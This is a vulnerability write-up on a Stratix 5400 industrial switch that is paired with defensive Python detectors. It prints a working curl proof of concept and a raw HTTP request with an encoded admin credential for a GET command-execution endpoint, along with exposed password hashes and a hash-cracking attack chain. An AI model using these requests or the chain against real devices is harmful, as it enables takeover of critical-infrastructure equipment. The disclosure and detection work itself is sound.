Critical Vulnerabilities in Cisco Stratix 5400: GET-Based RCE and Complete Attack Chain

Executive Summary

While playing around with a Rockwell Stratix 5400 industrial Ethernet switch, I uncovered a series of vulnerabilities that, when chained together, allow complete device compromise with minimal effort.

Key Findings

Vulnerability              | Impact                                                              | Exploitability
---------------------------|---------------------------------------------------------------------|----------------------------
GET-Based RCE (No CSRF)    | Full command execution                                              | Trivial - single HTTP GET
CSRF to RCE                | Unauthenticated attacker → RCE via an authenticated admin's browser | Easy - malicious webpage
Password Hash Exposure     | Complete credential disclosure                                      | Trivial - view HTML source
Privilege Escalation Chain | Read-only → Admin escalation                                        | Easy - hash cracking

Cisco Stratix 5400 Industrial Ethernet Switch - commonly deployed in critical infrastructure

Background: The Cisco Stratix 5400

The Cisco Stratix 5400 is an industrial-grade Ethernet switch designed for harsh environments including manufacturing facilities, utilities, oil & gas operations, and transportation systems.

Target Device Specifications:

  • Model: 1783-BMS10CGP

Critical Finding #1: GET-Based Remote Code Execution (No CSRF Protection)

The Vulnerability

The web interface exposes a GET-based command execution endpoint that accepts arbitrary CLI commands without CSRF token protection:

Endpoint: /%24{variable}%0A?{variable}=<command>
Method: GET
Authentication: Required (HTTP Basic Auth)
CSRF Protection: NONE

Technical Details

The endpoint uses URL-encoded variable substitution:

  • %24 = $ (dollar sign)
  • %0A = \n (newline)
  • Any variable name works: a, b, c, d, cmd, command, etc.

Working pattern discovered:

GET /%24b%0A?b=show%20running-config HTTP/1.1
Host: 192.168.103.143
Authorization: Basic YWRtaW46U3RlcGhlbjEz

Response: 200 OK
Content-Length: 4700
[Full device configuration with passwords]

Proof of Concept

curl -k -u admin:password \
  "https://192.168.103.143/%24b%0A?b=show%20version%20|%20include%20uptime"

# Returns:
stratix uptime is 11 hours, 42 minutes

Confirmed Working Commands

Command                 | Output Size | Sensitive Data
------------------------|-------------|------------------------------------------
show running-config     | 4,700 bytes | Passwords, SNMP strings, network config
show startup-config     | 3,354 bytes | Saved configuration
show version            | 2,921 bytes | IOS version, serial numbers
show users              | 142 bytes   | Active sessions
show ip interface brief | 820 bytes   | Network topology
dir flash:              | 1,113 bytes | File system contents
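To turn the endpoint pattern described above into something a SOC can look for, here is an added example (mine, not code from the original post or from Cisco) that scans access logs for requests whose percent-decoded path is `/$<name>\n` with a query parameter of the same name, and recovers the CLI command that was issued. The log lines are constructed; the example assumes a reverse proxy or network sensor in front of the management interface that records requests in Common Log Format.

```python
"""Detect hits on the '/$<var>\\n?<var>=<command>' endpoint in web access logs."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines (Common Log Format) from a reverse proxy or sensor
# in front of the switch's management interface; not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - admin [12/Mar/2024:10:01:02 +0000] "GET /%24b%0A?b=show%20running-config HTTP/1.1" 200 4700
10.0.0.5 - admin [12/Mar/2024:10:01:09 +0000] "GET /useraccounts.shtml HTTP/1.1" 200 8123
10.0.0.9 - admin [12/Mar/2024:10:02:30 +0000] "GET /%24cmd%0A?cmd=show%20version%20|%20include%20uptime HTTP/1.1" 200 60
10.0.0.9 - - [12/Mar/2024:10:02:31 +0000] "GET /%24x%0A?x=show%20users HTTP/1.1" 401 0
10.0.0.7 - admin [12/Mar/2024:10:03:00 +0000] "GET /%24a%0A?a=copy%20running-config%20startup-config HTTP/1.1" 200 57
"""

CLF_RE = re.compile(
    r'^(?P<src>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# After percent-decoding, the path is literally "/$<name>\n"; the variable name
# itself is arbitrary, so match on the shape rather than on a fixed name.
CMD_PATH_RE = re.compile(r'/\$(\w+)\n')


def parse_command_request(target):
    """Return (variable, command) if `target` hits the command endpoint, else None."""
    parts = urlsplit(target)
    m = CMD_PATH_RE.fullmatch(unquote(parts.path))
    if not m:
        return None
    var = m.group(1)
    qs = parse_qs(parts.query)          # parse_qs percent-decodes the values
    if var not in qs:                   # the path variable must be supplied in the query
        return None
    return var, qs[var][0]


def scan_access_log(text):
    """Return one finding per request that reached the command endpoint,
    including failed (401) attempts, which indicate probing of the endpoint."""
    findings = []
    for line in text.splitlines():
        m = CLF_RE.match(line)
        if not m:
            continue
        hit = parse_command_request(m.group('target'))
        if hit is None:
            continue
        var, cmd = hit
        findings.append({
            'src': m.group('src'), 'user': m.group('user'),
            'status': int(m.group('status')), 'variable': var, 'command': cmd,
            # 'show ...' reads configuration; anything else changed device state.
            'kind': 'read' if cmd.startswith('show ') else 'write',
        })
    return findings


if __name__ == '__main__':
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['kind']:5} {f['status']} {f['src']:10} {f['user']:6} "
              f"${f['variable']} -> {f['command']!r}")
```

Because the path variable is arbitrary, a signature on `%24b%0A` alone would miss the same request with a different name; matching the decoded shape and the matching query key catches every variant while ignoring ordinary page loads.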

Critical Finding #2: CSRF Leading to Unauthenticated RCE

Because the RCE endpoint accepts GET requests with no CSRF token, and the browser automatically re-sends cached HTTP Basic Auth credentials with every request to the device, any webpage can trigger command execution when it is visited by an administrator who is logged into the switch.

Attack Scenario

  1. Attacker creates malicious webpage
  2. Sends link to network administrator
  3. Admin clicks link while logged into switch web interface
  4. Malicious JavaScript executes commands in admin's browser context
  5. Full device configuration exfiltrated to attacker's server
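The scenario works because a forged GET arriving with the browser's cached Basic Auth credentials is indistinguishable, to the device, from the administrator's own click. The following is an added example (not code from the original post or from Cisco) of the policy a reverse proxy in front of an unpatchable management interface could apply to this endpoint: trust the browser-set Fetch Metadata headers first, fall back to Origin/Referer for older clients, and fail closed when no provenance is available. The device hostname, the header cases, and the assumption that the legitimate UI reaches the endpoint through XHR/fetch are mine.

```python
"""Gateway-side CSRF policy for a device whose web server cannot be changed:
decide whether a request to the command endpoint is same-origin before forwarding it."""
import re
from urllib.parse import unquote, urlsplit

CMD_PATH_RE = re.compile(r'/\$\w+\n')
DEVICE_HOST = 'switch.mgmt.example'   # placeholder hostname, not the address from the post


def is_command_endpoint(target):
    """True for the '/$<var>\\n' path, whatever the variable name or encoding."""
    return CMD_PATH_RE.fullmatch(unquote(urlsplit(target).path)) is not None


def decide(target, headers, device_host=DEVICE_HOST):
    """Return ('allow' | 'deny', reason) for one request seen by the proxy.

    The browser attaches the cached Basic Auth credentials to every request for
    the realm, so authentication says nothing about who initiated the request;
    provenance has to come from request metadata instead."""
    if not is_command_endpoint(target):
        return 'allow', 'not the command endpoint'
    h = {k.lower(): v for k, v in headers.items()}
    site = h.get('sec-fetch-site')
    if site is not None:
        # Fetch Metadata is set by the browser and cannot be altered by page script.
        # Assumption (mine): the legitimate UI calls the endpoint with XHR/fetch,
        # which is a same-origin request whose destination is 'empty'. A top-level
        # navigation (a clicked link, dest=document) is therefore treated as forged.
        if site == 'same-origin' and h.get('sec-fetch-dest') == 'empty':
            return 'allow', 'same-origin sub-resource fetch'
        return 'deny', f"sec-fetch-site={site} dest={h.get('sec-fetch-dest')}"
    # Older clients: Origin, then Referer, both name the page that initiated the request.
    for name in ('origin', 'referer'):
        if name in h:
            host = urlsplit(h[name]).hostname
            if host == device_host:
                return 'allow', f'{name} is the device itself'
            return 'deny', f'{name} host {host!r} is not the device'
    return 'deny', 'no provenance headers; fail closed'


# Constructed request cases (label, target, headers) covering the scenario above.
CASES = [
    ('ui fetch', '/%24b%0A?b=show%20users',
     {'Sec-Fetch-Site': 'same-origin', 'Sec-Fetch-Mode': 'cors', 'Sec-Fetch-Dest': 'empty'}),
    ('cross-site image', '/%24b%0A?b=show%20running-config',
     {'Sec-Fetch-Site': 'cross-site', 'Sec-Fetch-Mode': 'no-cors', 'Sec-Fetch-Dest': 'image'}),
    ('clicked link', '/%24b%0A?b=show%20running-config',
     {'Sec-Fetch-Site': 'none', 'Sec-Fetch-Mode': 'navigate', 'Sec-Fetch-Dest': 'document'}),
    ('legacy ui', '/%24b%0A?b=show%20users',
     {'Referer': 'https://switch.mgmt.example/index.html'}),
    ('legacy cross-site', '/%24b%0A?b=show%20users',
     {'Referer': 'https://third-party.example/page.html'}),
    ('no headers', '/%24b%0A?b=show%20users', {}),
    ('ordinary page', '/useraccounts.shtml',
     {'Sec-Fetch-Site': 'cross-site', 'Sec-Fetch-Dest': 'document'}),
]


def run_cases():
    """Map each case label to the proxy's verdict."""
    return {label: decide(target, hdrs)[0] for label, target, hdrs in CASES}


if __name__ == '__main__':
    for label, target, hdrs in CASES:
        verdict, reason = decide(target, hdrs)
        print(f'{label:18} {verdict:5} {reason}')
```

Non-browser tooling carries neither Fetch Metadata nor a Referer and is therefore denied as well; scripted administration belongs on SSH rather than on this endpoint. The `no ip http server` / HTTPS-only hardening that turns the web interface off entirely removes the exposure outright where the interface is not needed.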

Critical Finding #3: Password Hash Exposure

The useraccounts.shtml page includes a hidden textarea that contains the output of SSI commands, exposing all user account password hashes in the HTML source code.

Vulnerable Code

<textarea style="display:none; visibility:hidden;" id="USER_SUMMARY">
    <!--#exec cmd='more system:running-config | i user'-->
</textarea>

When rendered:

username admin privilege 15 secret 5 $1$P4Bi$8t74cAAknpCiVCvL7IC6T.
username vulntest privilege 5 secret 9 $9$wLzi8Cmi6aH91k$qOAH1kOzmLhTX1tKqGx/...
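The `secret 5` entry above is the one that makes the offline cracking phase cheap: type 5 is MD5-crypt, while type 9 is scrypt and far more expensive to guess against. As an added example (not code from the original post or from Cisco), here is an audit script that parses a saved copy of a device page, reports `username ... secret|password <type>` lines, flags whether each sat inside a CSS-hidden element the UI never shows, classifies the storage type, and notes any SSI `#exec` directives that reached the client. The sample HTML and the placeholder hashes are constructed; the hash value is redacted in the output so that the report does not itself become a credential dump.

```python
"""Audit a saved device web page for credential material embedded in hidden HTML."""
import re
from html.parser import HTMLParser

# Constructed sample, not the page from the original post: the hidden textarea as the
# server delivers it after expanding the SSI directive, plus one unexpanded directive.
# The hashes are placeholders shaped like the real formats, not real digests.
SAMPLE_HTML = """<html><body>
<textarea style="display:none; visibility:hidden;" id="USER_SUMMARY">
username admin privilege 15 secret 5 $1$saltsalt$XXXXXXXXXXXXXXXXXXXXXX
username oper privilege 5 secret 9 $9$saltsaltsaltsa$YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY
username legacy password 7 ABCDEF012345
</textarea>
<div style="display: none"><!--#exec cmd='show version'--></div>
<p>Visible status text.</p>
</body></html>"""

# Cisco IOS password storage types and how much offline guessing they resist.
HASH_TYPES = {
    '0': ('plaintext', 'critical'),
    '5': ('MD5-crypt', 'weak: fast GPU brute force'),
    '7': ('reversible Vigenere-style encoding', 'critical: recoverable instantly'),
    '8': ('PBKDF2-SHA-256', 'acceptable'),
    '9': ('scrypt', 'strong'),
}

CRED_RE = re.compile(
    r'^\s*username\s+(\S+)(?:\s+privilege\s+(\d+))?\s+(?:secret|password)\s+(\d)\s+(\S+)',
    re.M)


class PageAuditor(HTMLParser):
    VOID = {'br', 'img', 'input', 'hr', 'meta', 'link'}   # no closing tag; skip in depth tracking

    def __init__(self):
        super().__init__()
        self.hidden_stack = []   # one flag per open element: did it start a hidden subtree?
        self.hidden_depth = 0    # > 0 while inside display:none / visibility:hidden
        self.credentials = []
        self.ssi_directives = []

    def handle_starttag(self, tag, attrs):
        if tag in self.VOID:
            return
        style = (dict(attrs).get('style') or '').replace(' ', '').lower()
        hidden = 'display:none' in style or 'visibility:hidden' in style
        self.hidden_stack.append(hidden)
        self.hidden_depth += hidden

    def handle_endtag(self, tag):
        if tag not in self.VOID and self.hidden_stack:
            self.hidden_depth -= self.hidden_stack.pop()

    def handle_data(self, data):
        for user, priv, htype, digest in CRED_RE.findall(data):
            algo, rating = HASH_TYPES.get(htype, ('unknown', 'review'))
            self.credentials.append({
                'username': user,
                'privilege': int(priv) if priv else 1,   # IOS default privilege level is 1
                'type': htype, 'algorithm': algo, 'rating': rating,
                'hidden': self.hidden_depth > 0,
                'digest': digest[:3] + '...[redacted]',  # report the fact, never the hash
            })

    def handle_comment(self, data):
        # An SSI directive reaching the client means it was not expanded server-side
        # (or the template leaked); either way it reveals what the page executes.
        if data.lstrip().startswith('#exec'):
            self.ssi_directives.append({'directive': data.strip(),
                                        'hidden': self.hidden_depth > 0})


def audit_page(html):
    """Return the credential lines and SSI directives found in one page."""
    p = PageAuditor()
    p.feed(html)
    p.close()
    return {'credentials': p.credentials, 'ssi_directives': p.ssi_directives}


if __name__ == '__main__':
    report = audit_page(SAMPLE_HTML)
    for c in report['credentials']:
        where = 'HIDDEN' if c['hidden'] else 'visible'
        print(f"{where:7} {c['username']:8} priv {c['privilege']:2} type {c['type']} "
              f"{c['algorithm']} ({c['rating']}) {c['digest']}")
    for d in report['ssi_directives']:
        print('SSI directive reached client:', d['directive'])
```

Run against pages fetched with a read-only account, this shows exactly what a low-privilege user can read from the source; any type 5 or type 7 entry it reports is the remediation priority (re-enter the secret so it is stored as type 9), alongside removing the hidden textarea from the page.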

The Complete Attack Chain

Phase 1: Initial Access

Attacker obtains read-only credentials (default/weak passwords)

Phase 2: Information Disclosure

Access useraccounts.shtml → extract admin password hash from HTML source

Phase 3: Offline Password Cracking

Run hashcat on MD5-crypt hash → cracked in ~15 minutes with GPU

Phase 4: Admin Access

Login with cracked admin credentials → full web interface access

Phase 5: Remote Code Execution

Use GET-based RCE endpoint → extract all configuration, passwords, network topology

COMPLETE DEVICE COMPROMISE


Disclaimer: This assessment was performed on authorized equipment for security research purposes. All findings are reported in good faith to improve security.

This post is part of my ongoing ICS security research. For more projects and research, visit the ICS Projects page.
